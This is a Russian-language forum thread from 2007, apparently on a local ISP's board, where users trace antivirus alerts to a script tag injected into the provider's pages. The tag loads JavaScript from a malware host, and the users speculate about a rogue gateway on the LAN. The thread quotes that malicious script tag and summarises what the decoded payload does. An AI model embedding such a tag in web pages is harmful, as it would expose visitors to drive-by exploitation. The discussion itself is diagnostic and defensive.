MistiC - скорее всего такое безобразие именно у вас на компьютере, иначе бы тут толпы народу просто вопили бы о "зараженном вирусами Тенете"...
|
MistiC - скорее всего такое безобразие именно у вас на компьютере, иначе бы тут толпы народу просто вопили бы о "зараженном вирусами Тенете"...
Толпы не толпы, но кто-то писал про аналогичное на мклубе и у меня то же самое уже несколько дней. Именно этот же файл выдает 6-й Касперский. Вот дословно: вредоносная программа Exploit.Win32.IMG-ANI.ac, файл: hxxp://ads.adslooks.info/ads.c (заменил http на всякий случай)
Смотрел сниффером, на разных страницах Тенета (Mclub, новый файлообменник, основной сайт) перед тегом HTML идет такая строка:
На неё-то и ругаются антивирусы. Вероятность того, что проблема на сервере конечно невелика, тем более, что эта строка то появляется, то пропадает и внешние серваки её не видят (HTML-валидатор W3C, например). Значит заражена клиентская машина. Кто-то локально висит, перехватывает HTTP-трафик и встраивает своё. Но пока найти ничего не удалось, все проверки говорят, что всё хорошо. И вообще непонятно, зачем пытаться таким образом заражать машину, раз она уже заражена. Рекламу вываливать? Что особенно странно, что такое появляется только на сайтах Тенета.Код:<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.adslooks.info/ads.js"></SCRIPT>
Вот, кстати, очень похожая ситуация.
http://virusinfo.info/showthread.php?p=156946
Последний раз редактировалось dron007; 06.12.2007 в 01:56.
Специально облазил ИЕшником и Оперой и сайт тенета и мклуб и фп.
Никаких подобных строчек не видел, антивирус нислова не сказал.
Быть может дело в броузере, адБлокере или еще чем-то?
Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...
Проверялось в IE и в Опере - результат один и тот же. Глобальных адблокеров нет. В данный момент снова всё чисто - никаких строчек <SCRIPT> на страницах. Он то появляется, то пропадает.
Расшифровал код вируса. Пытается заражать машину один раз. После запуска ставит куки OKMOON=SUN. Использует всякие уязвимости в сторонних ActiveX и какую-то уязвимость с загрузкой курсора в IE. Иногда, если получается, загружает CAB со своего сайта. Никакой рекламы не показывает. В общем, выглядит как серверный. Ну зачем пытаться загружать CAB на уже зараженную машину?
Мое предположение:
долбо*** покупает новый комп
умная виста говорит
- а я могу быть сервером всей твоея сети! Да?
- конечно да! я же самый крутой
- антивир будем ставить?
- Нет! я же самый умный!
далее чудо цепляет трояна и назначив себя шлюзом сети пхает трояна всем в сети при обращении к внутрисетевым ресурсам (тенет, мклуб, видео)
походу кстати именно троян этот и мог включить его как шлюз исключив из пищевой цепочки "умную висту" и момент "крутости"
итого достаточно не иметь антивиря и посадить себе этого трояна
это мое сугубо личное мнение конечно, может и ошибочное и безграмотное.
Кстати статья на эту же тему - http://virusinfo.info/showthread.php?p=156946
====
*** - дятел
Последний раз редактировалось Dimiz; 06.12.2007 в 10:55.
Don't explain. Don't complain.
Нашел с чем его кушать
Взято тут:
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=70789
Exploit.Win32.IMG-ANI
Другие названия
Exploit.Win32.IMG-ANI («Лаборатория Касперского») также известен как: Bloodhound.Exploit.20 (Symantec), Exploit.Win32.MS05-002.Gen (SOFTWIN), Exploit/LoadImage (Panda)
Технические детали
Программа-эксплойт, представляющая собой файл графического формата (bmp, cur, ico или ani). Размер файла произвольный. Наиболее типичен формат ani и малый размер файла (до нескольких КБ).
Эксплуатирует уязвимость в алгоритме обработки графических файлов одной из системных библиотек Windows. При попытке просмотра файла, вследствие переполнения буфера на зараженной машине выполняется произвольный код.
Идентификатор уязвимости — CAN-2004-1049. Исправлена в обновлении MS05-002 от Microsoft.
--------------------------------------------------------------------------
Вот эта линка:
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
God doesn't believe in atheists
A+heis+, там их вообще-то целый набор. Это описание только одной уязвимости.
Dimiz, а такое возможно? Любой комп может стать шлюзом и перехватывать и обрабатывать трафик всей сети, да ещё так что админы этого не замечают и не отрубают его? Как можно проверить это? Посмотреть в свойствах соединения какой назначен шлюз?
Смотрел сниффером, на разных страницах Тенета (Mclub, новый файлообменник, основной сайт) перед тегом HTML идет такая строка:
ИМЕННО ОНО!Постоянно с Мклуба и главной и фтп...В тенете грят переустановите,но не грят что!))))Код:<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.adslooks.info/ads.js"></SCRIPT>
Кароче вирь валит из сети,рекламка и т.д.
Вирей на машине нет-Аутпост и НОД справятся с чем угодно...
Unam In Armis Salutae!!!!!
Vernius, PPS - если бы вы внимательно прочитали эту ветку - то знали бы, что ускорить подключение нельзя. Подключение происходит в порядке живой очереди, или если повезет и на очереди будут люди з Вашего дома.
Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...
Чтобы небыло проблем со сменившимся шлюзом - выключаем внутресетевые айпи (отключить TCP-IP на соеденении с локальной сетью), подключаемся по PPPoE и радуемся жизни.
Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...
Точно не уверен, что пишу где надо, но ОЧЕНЬ меня достала скорость скачивания медиа файлов! Всегда было от 200 до 300, а теперь как на внешке 10 - 25
Сообщение от mclubСообщение от tenet.uaкак вы думаете, почему у меня нет нигде джаваскрипта троянского ни в одной из вышеперечисленных страниц?Сообщение от http://fp.te.net.ua/fx/
Ты весь текст просмотрел?
Ну не знаю,еси считаешь НОД и Аутпост ненадежные проги...
Факт один-тока на сайтах тенета выдает блок на трояна...
Unam In Armis Salutae!!!!!
зачем мне просматривать весь текст, если вы сами же тут заявляли, что троян вешается в самом начале, перед открывающим тэгом <html> ?
я вообще-то к тому, что , если б сидело оно непосредственно на тенетовском хосте - то и у меня это было б видно, и мой бы антифирь кричал бы.
а так...
188 страниц?! =) Понимаю 8, на крайняк 18, но не 188 же!
Так "нельзя", "или если повезет и на очереди будут люди з Вашего дома"?
Это как пример. Потому и написал адрес заодно, что может и тут кто откликнется. А может и сам тенет решит в наших домах объявления расклеить. Так, глядишь, и люди найдутся, и "быстрее" раньше наступит.
Да и мы вроде как в Одессе, где было бы желание договориться
Может при оплате на год вперед заведут еще до НГ =)
<Вырезано, шоб не нарушать>
Последний раз редактировалось PPS; 06.12.2007 в 22:48.
PPS - почиайте правила данного подраздела и поймете, почему ваш пост был удален. О поиске возможностей подключения гораздо целесообразнее создать топик в разеделе "Интернет. Технические вопросы".
говорили уже -- не всегда код присутствует на страницах, вот к примеру, у меня сразу при загрузке компа есть такой код, жду 10 минут, обновляю страницу -- и могу спокойно далее логиниться на М-Клаб к примеру.
я таки склоняюсь, что эти "гадости" цепляются на стороне сервера, т.к. пакеты приходят уже с кодом внедрённым.
Час назад не проявлялось, а сейчас на Мклубе наблюдается. Шлюз не менялся - какой выдан, такой и стоит. Че ещё проверять не знаю.
Социальные закладки